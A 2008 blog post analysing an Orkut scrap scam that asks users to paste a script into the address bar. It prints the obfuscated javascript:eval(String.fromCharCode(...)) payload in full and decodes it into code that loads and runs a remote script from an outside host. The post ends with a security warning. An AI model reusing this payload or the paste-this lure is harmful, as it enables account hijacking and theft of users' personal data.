Orkut Scripts
Thursday, January 31st, 2008Of late, I’ve been getting a lot of scraps in orkut like “Paste this text into your address bar. Don’t worry it’s harmless…”
The latest is a pretty interesting one…
javascript:eval(String.fromCharCode(100, 61, 100, 111, 99, 117, 109, 101, 110, 116, 59, 99, 61, 100, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 100, 46, 98, 111, 100, 121, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 99, 41, 59, 99, 46, 115, 114, 99, 61, 39, 104, 116, 116, 112, 58, 47, 47, 99, 111, 111, 108, 112, 99, 115, 116, 117, 102, 102, 46, 103, 111, 111, 103, 108, 101, 112, 97, 103, 101, 115, 46, 99, 111, 109, 47, 114, 111, 100, 114, 105, 103, 111, 46, 117, 115, 101, 114, 46, 106, 115, 39, 59, 118, 111, 105, 100, 40, 48, 41))
The eval function of JavaScript takes a string and executes it as if it were JavaScript code. The String.fromCharCode function takes a series of numbers and converts it into their corresponding ASCII characters.
A simple one line C program reveals the string behind the integers (line breaks added for easy understanding):
d=document;
c=d.createElement('script');
d.body.appendChild(c);
c.src='http://coolpcstuff.googlepages.com/rodrigo.user.js';
void(0)
This is a pretty simple bit of code that appends the script located at the address shown above to the current document and executes it. Now, when I tried to get the script at the site, I get the message: This site has been disabled for violations of our Program Policies. .
A quick google search for the script file name yielded that the script simply floods your friends scrapbooks with the same message. Apparently harmless. The key word is apparently.
Now, I have a healthy dose of paranoia. I don’t trust any of these scripts unless I write them myself, or at least examine them myself. Now, I have tried to access some of the scripts directly (which should return the script source code without executing it), but the site gives me a permission denied (reason: hotlinking forbidden). That gives me all the more reason to suspect something is amiss.
I still don’t get it why people jump on scripts like this, when the orkut home page advertises (or at least used to) not to run any script when logged onto orkut. So, I’ll put out a simple security advisory.
Don’t run any script while logged into orkut (or for that matter, any website), no matter what it claims to do. For instance, one malicious script could always steal your personal information, even if you have hidden it from your friends. If a script can read your friends list, it can read anything.
